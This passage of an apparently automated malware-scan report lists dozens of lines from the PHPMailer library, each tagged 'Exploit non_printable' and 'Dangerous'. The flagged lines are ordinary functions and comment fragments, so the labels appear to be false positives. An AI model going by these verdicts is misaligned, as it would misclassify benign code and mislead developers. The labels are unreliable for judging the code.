</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3528</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3550</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3555</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3565</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3569</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3601</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3605</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3617</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3635</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3661</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3753</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3795</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3898</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3900</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3918</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3928</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3929</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3953</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3959</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3964</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3970</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3982</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4001</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4016</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4041</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4052</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
